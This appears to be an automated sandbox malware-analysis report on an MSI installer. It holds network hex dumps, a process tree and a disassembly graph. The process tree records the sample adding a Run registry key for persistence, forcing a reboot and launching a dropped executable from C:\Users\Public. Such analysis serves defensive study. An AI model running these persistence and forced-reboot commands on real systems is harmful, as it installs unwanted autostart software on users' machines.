b2 75 ae
                              Data Ascii: 8-;)IsSCdDDCf;0t9WQN(ODUQ&VPSK[CQDVuH(0$p83r+2bW4dH=>H}(Hu1S{(XXbHUKEC7\ X$;7PZ?iJ7xt!|NXuuw{*d9yBf@7vu
                              2024-08-02 12:16:49 UTC1369INData Raw: e5 78 85 94 c1 e9 02 50 22 53 00 56 ec 26 56 50 51 93 eb 15 d2 7d ce 75 89 b6 52 18 8d 73 10 1e d2 bf 9d 60 43 6a 30 6c 01 89 43 04 8b 10 8f 02 d8 ea 22 06 1a b2 43 91 34 ba 1d 80 f1 b8 30 93 57 42 b0 91 74 2a 16 4e 3e f5 1c df 4e bb 11 80 06 18 cc 28 bb 16 04 ab 28 89 18 a1 97 32 20 23 57 ec 84 85 47 ce 3b 86 43 53 6a a7 10 98 2c 89 18 27 f6 b1 a3 2e dc 3f a8 22 1e 41 b6 41 28 46 fc b8 b8 f8 02 c8 d8 74 3e 6c 33 16 27 12 1e 80 9d 3e 8b fe 68 4f 1a b5 88 3e 38 32 dc 57 b5 04 df d7 fe 00 07 40 81 83 c3 04 76 75 dd 64 a8 68 08 f4 1f 28 bd b0 92 09 41 1a 85 a0 12 9a 7c 3a 18 02 fc 08 07 1e ba 20 b0 50 44 50 02 9b d2 ce c6 54 38 ae 06 ae 22 2e 8d 45 e0 eb e0 57 84 6b 12 a9 4a 96 1c c5 aa 61 c7 ad 7f fa a0 0a 4d 70 13 60 02 ea d0 46 66 83 e2 02 4c 13 d2 40 ff
                              Data Ascii: xP"SV&VPQ}uRs`Cj0lC"C40WBt*N>N((2 #WG;CSj,'.?"AA(Ft>l3'>hO>82W@vudh(A|: PDPT8".EWkJaMp`FfL@
                              2024-08-02 12:16:49 UTC1369INData Raw: 5d f8 f8 ab c3 62 56 74 20 56 c3 31 66 90 3b 7f af c8 a5 e2 04 a6 89 60 52 29 74 ed eb 00 31 3a eb 1a 8b 0a 59 0f 7e 36 6a 41 1a 3e d1 76 89 50 22 2e c1 d3 87 37 09 15 db be 62 70 a7 a3 e3 0b 8b 72 84 d1 b4 9e 29 9f 07 c7 c2 4a ee e6 4e 39 50 87 f3 f0 0d 39 0b 39 11 32 31 98 b0 eb 9b eb 1b 39 13 ea 81 f9 eb 19 e4 8b fe e9 05 f9 7a 25 0c e0 fa 8e 89 5e c1 95 86 e0 32 38 39 57 4c 38 5d be 33 d1 c0 50 92 50 1e c9 7d f8 8a 58 0c d3 83 1f 2f ec 54 da b6 8b d6 2d 0b 0a 7e b7 7d 82 a8 81 f5 4d 62 53 eb 5f c2 a6 8f 35 46 11 62 17 75 16 38 01 1c f4 d8 a9 59 dd 75 52 0c 38 d8 05 07 46 62 0e 5e 69 b1 0e 39 58 b1 50 43 04 39 18 7c 10 5a d8 cf 70 b2 1a 8a 5a 0c 54 fd 8a 69 ba bd 2b 92 88 42 0c cc 88 22 80 fb 01 f4 57 ae c2 0c d8 74 a2 e4 48 14 b6 2b ed c2 c0 d2 d9 2c
                              Data Ascii: ]bVt V1f;`R)t1:Y~6jA>vP".7bpr)JN9P99219z%^289WL8]3PP}X/T-~}MbS_5Fbu8YuR8Fb^i9XPC9|ZpZTi+B"WtH+,
                              2024-08-02 12:16:49 UTC1369INData Raw: c8 50 12 3c 0a 61 15 71 01 48 1c 11 05 6a 68 44 c3 d6 d8 82 40 04 dc 6f ff 42 ed cc 2b c1 e8 72 20 8d 41 02 83 fa 10 44 d8 ba 3a 20 15 b6 82 30 32 0f 43 06 86 14 02 c0 37 12 e6 08 02 00 eb 14 ec 14 44 d5 e8 14 ec 76 b0 18 15 1b 82 fb ac 77 2c 18 b2 d0 51 ce 80 4a 10 66 70 f9 83 d9 a5 f1 55 b0 83 7d 3e c0 7c 14 ca 96 7e 84 36 be 75 d8 fe e0 51 52 76 02 69 ab a6 25 36 dc 10 26 ca c1 0a 98 c2 fa 03 f0 56 27 e0 05 ef 5e bb ba c6 04 06 d2 0c aa 51 c6 c3 42 c4 88 88 66 07 2a 72 0e c8 42 95 a7 ec 25 8f cb 00 0f 10 78 f2 ce b4 4f fd d8 0f 11 4d 98 d2 a8 ec ac 17 01 76 34 c0 7e c8 0f 07 83 8a 05 75 10 02 04 ea d8 3c 9c 18 5a 91 60 12 92 e4 2f c0 b3 15 94 c8 0e 89 4d e8 57 55 ac 05 0c 94 1e c5 07 21 8c 92 21 66 61 98 42 8d 43 8a 77 57 6a 4b 96 8b 53 0c 75 f8 38 89
                              Data Ascii: P<aqHjhD@oB+r AD: 02C7Dvw,QJfpU}>|~6uQRvi%6&V'^QBf*rB%xOMv4~u<Z`/MWU!!faBCwWjKSu8


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:08:16:38
                              Start date:02/08/2024
                              Path:C:\Windows\System32\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\9rybs.msi"
                              Imagebase:0x7ff775930000
                              File size:69'632 bytes
                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:08:16:39
                              Start date:02/08/2024
                              Path:C:\Windows\System32\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\msiexec.exe /V
                              Imagebase:0x7ff775930000
                              File size:69'632 bytes
                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              General

                              Target ID:3
                              Start time:08:16:39
                              Start date:02/08/2024
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 25DA5FC2F3AC90E0630AA0C19D390DBD
                              Imagebase:0xc0000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:4
                              Start time:08:16:53
                              Start date:02/08/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /C start /MIN reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:5
                              Start time:08:16:53
                              Start date:02/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:6
                              Start time:08:16:53
                              Start date:02/08/2024
                              Path:C:\Windows\SysWOW64\reg.exe
                              Wow64 process (32bit):true
                              Commandline:reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v PeFIvJrY /t reg_sz /d "C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
                              Imagebase:0x810000
                              File size:59'392 bytes
                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:7
                              Start time:08:16:53
                              Start date:02/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:9
                              Start time:08:16:55
                              Start date:02/08/2024
                              Path:C:\Windows\SysWOW64\shutdown.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\shutdown.exe" /r /f /t 15
                              Imagebase:0x410000
                              File size:23'552 bytes
                              MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:10
                              Start time:08:16:55
                              Start date:02/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:12
                              Start time:08:17:05
                              Start date:02/08/2024
                              Path:C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
                              Imagebase:0x3e0000
                              File size:358'000 bytes
                              MD5 hash:65CD1FFDB524F091FC06884DCB1270F9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              General

                              Target ID:13
                              Start time:08:17:14
                              Start date:02/08/2024
                              Path:C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\Public\PeFI\vJrY\PeFIvJrY.exe"
                              Imagebase:0x3e0000
                              File size:358'000 bytes
                              MD5 hash:65CD1FFDB524F091FC06884DCB1270F9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:6.4%
                                Dynamic/Decrypted Code Coverage:12.3%
                                Signature Coverage:8.4%
                                Total number of Nodes:1362
                                Total number of Limit Nodes:27
                                execution_graph 60803 63077e0 60805 6307808 60803->60805 60807 6307834 60803->60807 60804 6307811 60805->60804 60808 6306cac 60805->60808 60809 6306cb7 60808->60809 60810 6307b2b 60809->60810 60812 6306cc8 60809->60812 60810->60807 60813 6307b60 OleInitialize 60812->60813 60814 6307bc4 60813->60814 60814->60810 61875 3ef54f 61878 3ef566 _Ref_count_obj 61875->61878 61876 3ef985 61877 4291af 183 API calls 61876->61877 61879 3ef98a 61877->61879 61878->61876 61880 3e21d0 185 API calls 61878->61880 61881 3ef5f3 61880->61881 61909 3ef180 CreateMutexW GetLastError 61881->61909 61883 3ef5f8 61884 3ef6b7 61883->61884 61889 3ef64a 61883->61889 61885 3ef6cf K32EnumProcesses 61884->61885 61886 3ee7b0 239 API calls 61884->61886 61891 3ef6ec 61885->61891 61902 3ef742 61885->61902 61887 3ef6cc 61886->61887 61887->61885 61888 3ef72d 61890 3ee7b0 239 API calls 61888->61890 61888->61902 61892 3ee7b0 239 API calls 61889->61892 61895 3ef65f 61889->61895 61890->61902 61891->61888 61918 3f5630 61891->61918 61923 3fab50 61891->61923 61892->61895 61894 3ef95b _Ref_count_obj 61896 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61894->61896 61895->61876 61895->61894 61901 3ef97f 61896->61901 61898 3ef831 GetDC 61899 3ef84b GetDeviceCaps GetDeviceCaps ReleaseDC 61898->61899 61900 3ef880 61898->61900 61899->61900 61958 3f14a0 GetDC 61900->61958 61902->61895 61902->61898 61905 3ef8c6 GetDesktopWindow GetClientRect 61988 3ef990 GetModuleHandleW LoadIconW LoadCursorW LoadIconW RegisterClassExW 61905->61988 61906 3ee7b0 239 API calls 61908 3ef8c3 61906->61908 61908->61905 61910 3ef1b1 61909->61910 61911 3ef1d5 _Ref_count_obj 61909->61911 61910->61911 61912 4291af 183 API calls 61910->61912 61911->61883 61913 3ef1e8 61912->61913 61914 3ef27f GlobalDeleteAtom 61913->61914 61915 3ef28c 61913->61915 61914->61915 61916 3ef29a _Ref_count_obj 61915->61916 61917 3ef293 FreeLibrary 61915->61917 61916->61883 61917->61916 61919 3f565c 61918->61919 61920 3f5663 61919->61920 62020 3e2340 185 API calls Concurrency::cancel_current_task 61919->62020 61920->61891 61922 3f56a2 std::_Rethrow_future_exception 61922->61891 62021 4279a0 61923->62021 61926 3faf0c 61928 3faf38 _Ref_count_obj 61926->61928 61933 3faf67 61926->61933 61927 3fabeb K32EnumProcessModules 61929 3fac16 K32GetModuleBaseNameW 61927->61929 61930 3faf00 FindCloseChangeNotification 61927->61930 61931 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61928->61931 61929->61930 61932 3fac3c 61929->61932 61930->61926 61934 3faf5b 61931->61934 61937 3e21d0 185 API calls 61932->61937 61935 4291af 183 API calls 61933->61935 61934->61891 61936 3faf6c 61935->61936 61938 3fac89 61937->61938 61942 3facfb 61938->61942 62023 42e03b 184 API calls 61938->62023 61940 3faec4 61941 3faef0 _Ref_count_obj 61940->61941 61946 3faf62 61940->61946 61941->61930 61942->61940 61943 3fad6f TerminateProcess 61942->61943 61944 3fae65 WaitForSingleObject 61943->61944 61945 3fad85 61943->61945 61947 3fae7c 61944->61947 61952 3fae89 61944->61952 61948 3fad92 GetLastError 61945->61948 61957 3fae22 _Ref_count_obj 61945->61957 61949 4291af 183 API calls 61946->61949 61950 3ee7b0 239 API calls 61947->61950 61951 3fada0 61948->61951 61949->61933 61950->61952 61951->61951 61953 3fadf4 61951->61953 61955 3e21d0 185 API calls 61951->61955 61954 3ee7b0 239 API calls 61952->61954 61952->61957 61956 3ee7b0 239 API calls 61953->61956 61954->61957 61955->61953 61956->61957 61957->61940 61957->61946 61959 3f1505 GetDeviceCaps GetDeviceCaps ReleaseDC 61958->61959 61960 3f1541 61958->61960 61961 3f1546 KiUserCallbackDispatcher 61959->61961 61960->61961 61962 3f159e 61961->61962 61963 3f1709 61961->61963 61965 3ee7b0 239 API calls 61962->61965 61970 3f161b 61962->61970 61964 425d49 6 API calls 61963->61964 61968 3f1803 RegOpenKeyExW 61963->61968 61966 3f1733 61964->61966 61967 3f15fb 61965->61967 61966->61968 62024 3f0f20 185 API calls 2 library calls 61966->62024 61967->61970 61973 3ee7b0 239 API calls 61967->61973 61972 3f18ca RegQueryValueExW 61968->61972 61985 3f18ff 61968->61985 61970->61963 61974 3ee7b0 239 API calls 61970->61974 61978 3f16a4 61970->61978 61976 3f18f9 61972->61976 61977 3f1931 RegCloseKey 61972->61977 61973->61970 61974->61978 61975 3f17ec 62025 42598b 186 API calls 61975->62025 61976->61977 61976->61985 61977->61985 61978->61963 61980 3ee7b0 239 API calls 61978->61980 61980->61963 61981 3ee7b0 239 API calls 61986 3f1969 61981->61986 61982 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61987 3ef8ae 61982->61987 61983 3f17f6 62026 425cff RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 61983->62026 61985->61981 61985->61986 61986->61982 61987->61905 61987->61906 61989 3efa6c MessageBoxW 61988->61989 61990 3efa88 CreateWindowExW 61988->61990 62014 3efd25 61989->62014 61991 3efacb MessageBoxW 61990->61991 61992 3efae4 SetWindowLongW SetWindowLongW GetWindowLongW SetWindowLongW SetWindowTextW 61990->61992 61991->62014 61994 3efb22 61992->61994 61998 3efb37 61992->61998 61993 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61995 3efd42 61993->61995 61996 3ee7b0 239 API calls 61994->61996 61994->61998 61995->61895 61996->61998 61997 3efb63 IsInExceptionSpec 62000 3efb80 GetTempPathW 61997->62000 61998->61997 61999 3ee7b0 239 API calls 61998->61999 61999->61997 62001 3efbd0 62000->62001 62001->62001 62002 3e21d0 185 API calls 62001->62002 62003 3efbf2 62002->62003 62027 3f5500 62003->62027 62005 3efc06 62032 425e1f 62005->62032 62009 3efc73 62010 3efcaf _Ref_count_obj 62009->62010 62012 3efd6b 62009->62012 62011 3efcd5 GetMessageW 62010->62011 62016 3ee7b0 239 API calls 62010->62016 62013 3efcee 62011->62013 62011->62014 62015 4291af 183 API calls 62012->62015 62017 3efd00 TranslateMessage DispatchMessageW GetMessageW 62013->62017 62014->61993 62018 3efd70 62015->62018 62019 3efcd2 62016->62019 62017->62014 62017->62017 62019->62011 62020->61922 62022 3fabcd OpenProcess 62021->62022 62022->61926 62022->61927 62023->61938 62024->61975 62025->61983 62026->61968 62028 3f5510 62027->62028 62028->62028 62031 3f552b std::_Rethrow_future_exception 62028->62031 62035 3f84b0 185 API calls 2 library calls 62028->62035 62030 3f556e 62030->62005 62031->62005 62033 42571f 185 API calls 62032->62033 62034 3efc14 CreateCoreWebView2EnvironmentWithOptions 62033->62034 62034->62009 62035->62030 62036 632a400 DuplicateHandle 62037 632a496 62036->62037 60815 3ef3dd 60832 425d49 RtlEnterCriticalSection 60815->60832 60817 3ef3e7 60831 3ef478 60817->60831 60837 42571f 60817->60837 60819 3ef499 60871 425711 60819->60871 60820 3ef41d 60851 3ee2b0 60820->60851 60824 3ef440 60862 3f4680 240 API calls _Ref_count_obj 60824->60862 60825 3ef97f 60827 3ef45a 60863 42598b 186 API calls 60827->60863 60829 3ef464 60864 425cff RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 60829->60864 60831->60819 60865 3ee7b0 60831->60865 60835 425d5d 60832->60835 60834 425d62 RtlLeaveCriticalSection 60834->60817 60835->60834 60878 425dd1 SleepConditionVariableCS RtlLeaveCriticalSection WaitForSingleObjectEx RtlEnterCriticalSection 60835->60878 60839 425724 60837->60839 60840 42573e 60839->60840 60842 425740 60839->60842 60879 42e6ee 60839->60879 60890 42e093 RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 60839->60890 60840->60820 60843 3e2090 Concurrency::cancel_current_task 60842->60843 60844 42574a 60842->60844 60886 427210 60843->60886 60846 427210 Concurrency::cancel_current_task RaiseException 60844->60846 60848 4265f1 60846->60848 60847 3e20ac 60889 426fbb 184 API calls 3 library calls 60847->60889 60850 3e20d3 60850->60820 60893 3ffe90 60851->60893 60853 3ee301 60902 3ee010 60853->60902 60856 42571f 185 API calls 60857 3ee355 60856->60857 60926 3ea050 60857->60926 60859 3ee331 60861 3ee3bf _Ref_count_obj 60859->60861 60948 3ea310 257 API calls 60859->60948 60861->60824 60862->60827 60863->60829 60864->60831 60866 3ee7d3 60865->60866 60867 3ee819 60866->60867 61664 4090d0 60866->61664 60867->60819 60872 42571a IsProcessorFeaturePresent 60871->60872 60873 425719 60871->60873 60875 425a13 60872->60875 60873->60825 61874 4259d6 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 60875->61874 60877 425af6 60877->60825 60878->60835 60884 43023b __dosmaperr 60879->60884 60880 430279 60892 42da48 14 API calls __dosmaperr 60880->60892 60882 430264 RtlAllocateHeap 60883 430277 60882->60883 60882->60884 60883->60839 60884->60880 60884->60882 60891 42e093 RtlEnterCriticalSection RtlLeaveCriticalSection __dosmaperr 60884->60891 60887 427257 RaiseException 60886->60887 60888 42722a 60886->60888 60887->60847 60888->60887 60889->60850 60890->60839 60891->60884 60892->60883 60895 3ffed4 60893->60895 60896 3fff45 60893->60896 60894 3fff19 60897 3fff25 QueryUnbiasedInterruptTime 60894->60897 60895->60894 60895->60897 60898 3ffef5 QueryUnbiasedInterruptTimePrecise 60895->60898 60899 3fff5a 60896->60899 60900 3fffa6 QueryInterruptTime 60896->60900 60897->60853 60898->60853 60899->60853 60899->60899 60900->60853 60949 3edd20 60902->60949 60908 3ee136 _Ref_count_obj 60909 3ee159 60908->60909 60912 3ee7b0 239 API calls 60908->60912 60981 3f5300 60909->60981 60910 3ee236 60992 4291af 60910->60992 60911 3ee0b8 _Ref_count_obj 60911->60908 60911->60910 60912->60909 60917 3ee1a3 60922 3ee216 60917->60922 60997 400320 60917->60997 60921 3ee166 60921->60917 60991 3faf70 5 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 60921->60991 60924 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 60922->60924 60925 3ee22f 60924->60925 60925->60856 60925->60859 60927 42571f 185 API calls 60926->60927 60928 3ea15a 60927->60928 61441 4247b1 60928->61441 60930 3ea18f 60931 3ee7b0 239 API calls 60930->60931 60933 3ea1f6 60930->60933 60931->60933 60932 42571f 185 API calls 60934 3ea200 60932->60934 60933->60932 61444 42de20 60934->61444 60936 3ea221 60937 3ea22d 60936->60937 60938 3ea281 60936->60938 60940 3ea28f 60937->60940 60941 3ea236 60937->60941 61459 424c3e 187 API calls Concurrency::cancel_current_task 60938->61459 61460 42ded1 183 API calls 3 library calls 60940->61460 60942 3ea260 60941->60942 60944 3ee7b0 239 API calls 60941->60944 60945 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 60942->60945 60944->60942 60947 3ea27d 60945->60947 60947->60859 60948->60861 61022 3e8200 60949->61022 60952 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 60953 3edeae 60952->60953 60968 3edf00 60953->60968 60956 3ede18 _Ref_count_obj 61036 3fd2a0 60956->61036 60957 3edeb5 60959 4291af 183 API calls 60957->60959 60960 3ede57 60959->60960 61046 3f51a0 183 API calls _Ref_count_obj 60960->61046 60962 3ede5f 60963 3ede6c 60962->60963 60964 3edee8 60962->60964 61047 4000b0 203 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 60963->61047 61048 3e2140 185 API calls 60964->61048 60967 3edd81 60967->60952 60969 3edf69 60968->60969 61245 3f53f0 60969->61245 60971 3edfea 60972 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 60971->60972 60973 3ee004 60972->60973 60976 3f5580 60973->60976 60975 3edf82 std::_Rethrow_future_exception 60975->60971 61255 3f84b0 185 API calls 2 library calls 60975->61255 60977 3f55d6 _Ref_count_obj 60976->60977 60978 3f55ad 60976->60978 60977->60911 60978->60977 60979 4291af 183 API calls 60978->60979 60980 3f562a 60979->60980 60982 3f5347 GetCurrentThreadId 60981->60982 60983 3f535b 60982->60983 60984 3f5364 60983->60984 61258 400460 60983->61258 60984->60921 60986 3f5392 61275 3e7230 60986->61275 60989 427210 Concurrency::cancel_current_task RaiseException 60990 3f53d1 60989->60990 60990->60921 60991->60917 61345 4290eb 183 API calls ___std_exception_copy 60992->61345 60994 4291be 61346 4291cc 11 API calls IsInExceptionSpec 60994->61346 60996 4291cb 60998 404100 15 API calls 60997->60998 60999 400360 60998->60999 61347 400030 60999->61347 61002 4003a4 61004 404100 15 API calls 61002->61004 61003 3fe9d0 203 API calls 61005 4003c2 61003->61005 61006 400415 61004->61006 61351 400000 187 API calls 61005->61351 61009 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61006->61009 61008 4003e1 61352 3fe930 185 API calls 61008->61352 61011 3ee249 61009->61011 61014 4016f0 61011->61014 61012 4003ef 61013 3e22e0 183 API calls 61012->61013 61013->61002 61373 4010b0 61014->61373 61017 3e22e0 61018 3e22eb 61017->61018 61019 3e230c _Ref_count_obj 61017->61019 61018->61019 61020 4291af 183 API calls 61018->61020 61019->60922 61021 3e2332 61020->61021 61023 3fd2a0 191 API calls 61022->61023 61024 3e8263 61023->61024 61025 3e830c 61024->61025 61026 3e826d 61024->61026 61109 3f51a0 183 API calls _Ref_count_obj 61025->61109 61049 3feba0 61026->61049 61029 3e8287 61030 3e82c4 _Ref_count_obj 61029->61030 61033 4291af 183 API calls 61029->61033 61091 3e8180 61030->61091 61032 3e82f7 61034 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61032->61034 61033->61030 61035 3e8305 61034->61035 61035->60956 61035->60957 61035->60967 61198 3ff3f0 61036->61198 61038 3fd338 61215 3ff4f0 GetCurrentProcess 61038->61215 61041 3e21d0 185 API calls 61042 3fd381 61041->61042 61043 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61042->61043 61044 3ede3e 61043->61044 61044->60960 61045 3fd050 6 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 61044->61045 61045->60960 61046->60962 61047->60967 61048->60967 61055 3fec1d 61049->61055 61075 3ff054 _Ref_count_obj 61049->61075 61050 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61052 3ff0a9 61050->61052 61051 3fec67 61051->61029 61052->61029 61054 3feca1 GetFileVersionInfoSizeExW 61057 3fecf5 61054->61057 61058 3ff0e0 GetLastError 61054->61058 61055->61051 61110 3e21d0 61055->61110 61120 3fe9d0 61057->61120 61061 3ff107 GetLastError 61063 3ff12e 61061->61063 61062 3fed31 61065 3e22e0 183 API calls 61062->61065 61064 4291af 183 API calls 61063->61064 61066 3ff133 61064->61066 61067 3fed4b 61065->61067 61127 3f51a0 183 API calls _Ref_count_obj 61066->61127 61067->61063 61068 3fed7f _Ref_count_obj 61067->61068 61068->61066 61069 3feda7 VerQueryValueW 61068->61069 61070 3ff1ad GetLastError 61069->61070 61090 3fedea _Ref_count_obj 61069->61090 61129 3f51a0 183 API calls _Ref_count_obj 61070->61129 61073 3ff009 61073->61075 61078 4291af 183 API calls 61073->61078 61074 3feba0 196 API calls 61074->61090 61075->61050 61077 3ff170 61128 3f51a0 183 API calls _Ref_count_obj 61077->61128 61078->61070 61080 3fee87 GetLastError 61124 3ffaa0 183 API calls _Ref_count_obj 61080->61124 61082 3ff18a 61084 4291af 183 API calls 61082->61084 61086 3ff1a3 61084->61086 61085 3e21d0 185 API calls 61085->61090 61088 4291af 183 API calls 61086->61088 61087 3e22e0 183 API calls 61087->61090 61088->61073 61090->61070 61090->61073 61090->61074 61090->61077 61090->61080 61090->61082 61090->61085 61090->61086 61090->61087 61123 4000b0 203 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 61090->61123 61125 3f51a0 183 API calls _Ref_count_obj 61090->61125 61126 3ffaa0 183 API calls _Ref_count_obj 61090->61126 61092 3e818c 61091->61092 61093 3e81bb _Ref_count_obj 61091->61093 61092->61093 61094 4291af 183 API calls 61092->61094 61093->61032 61095 3e81f1 61094->61095 61096 3fd2a0 191 API calls 61095->61096 61097 3e8263 61096->61097 61098 3e830c 61097->61098 61099 3e826d 61097->61099 61197 3f51a0 183 API calls _Ref_count_obj 61098->61197 61100 3feba0 203 API calls 61099->61100 61104 3e8287 61100->61104 61102 3e82c4 _Ref_count_obj 61103 3e8180 209 API calls 61102->61103 61105 3e82f7 61103->61105 61104->61102 61106 4291af 183 API calls 61104->61106 61107 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61105->61107 61106->61102 61108 3e8305 61107->61108 61108->61032 61109->61030 61113 3e21ee std::_Rethrow_future_exception 61110->61113 61114 3e2220 61110->61114 61111 3e22d2 61131 3e2130 185 API calls 61111->61131 61113->61054 61114->61111 61130 3e2340 185 API calls Concurrency::cancel_current_task 61114->61130 61117 3e2266 std::_Rethrow_future_exception 61118 3e22b1 _Ref_count_obj 61117->61118 61119 4291af 183 API calls 61117->61119 61118->61054 61119->61111 61132 3fea40 61120->61132 61122 3fea19 GetFileVersionInfoExW 61122->61061 61122->61062 61123->61090 61124->61090 61125->61090 61126->61090 61127->61075 61128->61075 61129->61075 61130->61117 61135 3fea58 61132->61135 61136 3fea88 61132->61136 61133 3feb8d 61189 3e2130 185 API calls 61133->61189 61135->61122 61136->61133 61137 3feaa1 61136->61137 61139 3feb88 61136->61139 61141 3feb0e 61136->61141 61137->61139 61140 3feaf2 61137->61140 61138 4291af 183 API calls 61152 3feb97 61138->61152 61188 3e2090 185 API calls 2 library calls 61139->61188 61142 42571f 185 API calls 61140->61142 61144 3feaf8 61141->61144 61145 42571f 185 API calls 61141->61145 61142->61144 61144->61138 61146 3feb6c _Ref_count_obj 61144->61146 61145->61144 61146->61122 61147 425711 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 61149 3ff0a9 61147->61149 61148 3fec67 61148->61122 61149->61122 61150 3e21d0 185 API 